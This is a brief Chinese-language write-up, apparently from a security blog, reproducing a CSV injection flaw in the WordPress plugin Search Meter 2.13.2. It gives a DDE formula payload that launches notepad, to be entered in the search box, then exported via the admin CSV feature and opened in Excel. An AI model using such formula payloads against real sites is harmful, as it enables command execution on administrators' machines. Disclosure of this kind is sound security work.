007-WordPress Plugin – Search Meter 2.13.2 CSV Injection

# WordPress Plugin – Search Meter 2.13.2 CSV Injection

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

首先在搜索框里输入paylaod

“`
=cmd|’ /C notepad’!’A1′
“`

然后访问 `http://url/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php` 并且到处csv文件

之后,我们在Excel中打开文件,并使用逗号作为分隔符从外部文件导入数据

这时候payload就会被执行了

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容